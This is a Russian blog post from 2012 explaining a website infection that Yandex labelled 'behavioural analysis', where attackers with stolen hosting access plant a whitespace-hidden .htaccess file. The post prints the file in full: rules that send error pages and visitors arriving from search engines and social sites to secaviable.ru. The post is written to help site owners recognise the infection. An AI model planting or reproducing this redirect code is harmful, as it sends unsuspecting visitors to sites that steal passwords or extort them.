четверг, 5 апреля 2012 г.

Поведенческий анализ - заражение сайтов в Яндекс!


Сегодня столкнулся с тем, что сразу у нескольких сайтов в Яндекс Вебмастере был обнаружен вредоносный код:

При выяснении, что именно за вредоносный код было получено следующее:
Вердикт: Поведенческий анализ.
На вопрос, как  разрешить данный инцидент и избавиться от указанного кода, Яндекс не дает никаких вразумительных рекомендаций.
После долгих поисков была найдена следующая информация:

Технологии не стоят на месте. Появился новый вирус который открывает нужные сайты в зависимости от сайтов с которых вы заходите.

Определяется вирус в Яндексе как «Поведенческий анализ».

Вирус может направлять пользователей зашедших на ваш сайт на какие угодно сайты, на сайты с вирусами которые будут воровать ваши пароли или блокировать компьютер и вымогать послать СМС на их номер.

Эти вирусы могут использоваться для накручивания посетителей на сайтах. Также и для раскрутки сайтов поведенческим фактором.

Имея полный доступ к вашим сайтам, преступники могут менять адреса и направлять посетителей на новые и новые ресурсы.

Поисковые системы Яндекс и Google опережают на 1 шаг создателей вирусов и постепенно блокируют подобные зараженные сайты (примерно в течение недели), но если сайт популярный и был взломан то многие посетители за эту неделю могут пострадать.

Заражение происходит из-за кражи паролей от хостинга, либо от взлома хостинга. На хостинг размещается файл .htaccess (вредоносный код сдвинут пробелами, что бы вы его не сразу смогли найти) с таким содержанием:

ErrorDocument 400 http://secaviable.ru/about/index.php

ErrorDocument 401 http://secaviable.ru/about/index.php

ErrorDocument 403 http://secaviable.ru/about/index.php

ErrorDocument 404 http://secaviable.ru/about/index.php

ErrorDocument 500 http://secaviable.ru/about/index.php

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]

RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteCond %{HTTP_REFERER} .*baidu.* [OR]

RewriteCond %{HTTP_REFERER} .*youtube.* [OR]

RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]

RewriteCond %{HTTP_REFERER} .*qq.* [OR]

RewriteCond %{HTTP_REFERER} .*excite.* [OR]

RewriteCond %{HTTP_REFERER} .*altavista.* [OR]

RewriteCond %{HTTP_REFERER} .*msn.* [OR]

RewriteCond %{HTTP_REFERER} .*netscape.* [OR]

RewriteCond %{HTTP_REFERER} .*aol.* [OR]

RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]

RewriteCond %{HTTP_REFERER} .*goto.* [OR]

RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]

RewriteCond %{HTTP_REFERER} .*mamma.* [OR]

RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]

RewriteCond %{HTTP_REFERER} .*lycos.* [OR]

RewriteCond %{HTTP_REFERER} .*search.* [OR]

RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]

RewriteCond %{HTTP_REFERER} .*bing.* [OR]

RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]

RewriteCond %{HTTP_REFERER} .*facebook.* [OR]

RewriteCond %{HTTP_REFERER} .*twitter.* [OR]

RewriteCond %{HTTP_REFERER} .*blog.* [OR]

RewriteCond %{HTTP_REFERER} .*live.* [OR]

RewriteCond %{HTTP_REFERER} .*myspace.* [OR]

RewriteCond %{HTTP_REFERER} .*mail.* [OR]

RewriteCond %{HTTP_REFERER} .*yandex.* [OR]

RewriteCond %{HTTP_REFERER} .*rambler.* [OR]

RewriteCond %{HTTP_REFERER} .*ya.* [OR]

RewriteCond %{HTTP_REFERER} .*aport.* [OR]

RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]

RewriteCond %{HTTP_REFERER} .*flickr.*

RewriteRule ^(.*)$ http://secaviable.ru/about/index.php [R=301,L]

</IfModule>

Источник: smonews.ru

Комментариев нет:

Отправить комментарий